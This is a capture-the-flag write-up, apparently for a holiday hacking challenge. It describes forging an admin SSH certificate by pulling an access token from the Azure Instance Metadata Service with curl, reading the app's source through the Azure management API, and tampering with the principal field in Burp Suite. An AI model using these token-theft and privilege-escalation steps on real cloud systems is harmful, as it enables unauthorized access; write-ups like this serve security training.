Certificate SSHenanigans
Tools/Skills: Certificates, SSH, Azure Instance Metadata Service, Python, Burp Suite, Source Code
SYNOPSIS
I needed to get access to an admin account to determine what kind of cookies were on Alabaster's to-do list.
By using a certificate generator website, I created a certificate to login as a user ("monitor") with an "Elf" Principal. I then ssh'd into the system as "monitor". From there, I found information that I could use to access the certificate website's source code. By accessing Azure Instance Metadata Service, I found the subscription ID, resource group, and access token. With that information, I accessed the source code of the website. The source code revealed that I could specify the principal when I created a certificate. Having already located that I needed a principal of "admin", I intercepted the certificate traffic using Burp Suite, specified the principal as admin, then created an admin certificate. I then logged in and found out that on Alabaster's to-do list were gingerbread cookies.
SOLUTION
CREATE PUBLIC KEY & PRIVATE KEY PAIR
SSH INTO MONITOR
ssh monitor@ssh-server-vm.santaworkshopgeeseislands.org -i monitor_ssh_keyPRINCIPALS
SUBSCRIPTION ID & RESOURCE GROUP
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2022-03-01" | jqSUBSCRIPTION ID: 2b0942f3-9bca-484b-a508-abdae2db5e64
RESOURCEGROUP: NORTHPOLE-RG1
ACCESS TOKEN
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"NAME OF APP
Domain of the website: https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl
REPOSITORY
curl -X GET \-H "Authorization: Bearer [access token] " \ https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01In the Github repo, it shows that the code is willing to take an input for both the public key and the principal. If the principal is not included, it will go to the default (elf). I looked at the way the response would look like, which gave me an indication as to the format it wanted the http request in: {“ssh_cert”: string, “principal”: string}. I also looked at the sanitation that was happening to get a feel for the format.
Using Burp Suite, I intercepted the message, added the principal as “admin”, then copied and pasted the certificate into my certificate file for alabaster.
I logged in as alabaster (whose principal is “admin”) and opened the todo list file.
The answer is: Gingerbread
PROCESS
This was a two-day process. It was circular, tangential, dimensional-hopping at times. It was practically never linear.
Tools I used:
Provided Video
Discord
Reading through the different clues and recommended websites proved invaluable.
ChatGPT
Example Prompt:
I have a public and private key pair generated on my computer. An ssh certificate was created by someone else. All I have is:
{"ssh_cert": "ssh-ed25519-cert-v01@openssh.com AAAAIHNzaC1lZDI1NTE5LWNlcnQtdjAxQG9wZW5zc2guY29tAAAAJzI1MjUxODgwNjI1NDQxMTg2NDE0ODU5NTM2MzE0NzYxODY2NDU2NQAAACChnwy68XO5RNMeGhmsaVPuCMxT1wEg0Z1EsnnpOlyFXwAAAAAAAAABAAAAAQAAACRlMGExNmU5OS1lNThlLTRlMzAtYTUyZS0yNDU1ODE3NGY2YjUAAAAHAAAAA2VsZgAAAABllZ6tAAAAAGW6idkAAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEAllLS7ouA+8Mh6fUq6hkj8ot2k3Wrkfkiu4x7/DRqPwr05AQparr7QQjc6mpClc7DAtZD414nmpB4BjTpBnt8A ",
"principal": "elf"
}
How do I get the certificate on my computer?
Last updated